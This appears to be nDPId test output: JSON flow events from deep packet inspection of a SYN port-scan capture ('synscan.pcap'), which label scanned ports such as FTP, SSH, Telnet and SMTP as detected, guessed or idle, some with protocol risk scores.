+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00736{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 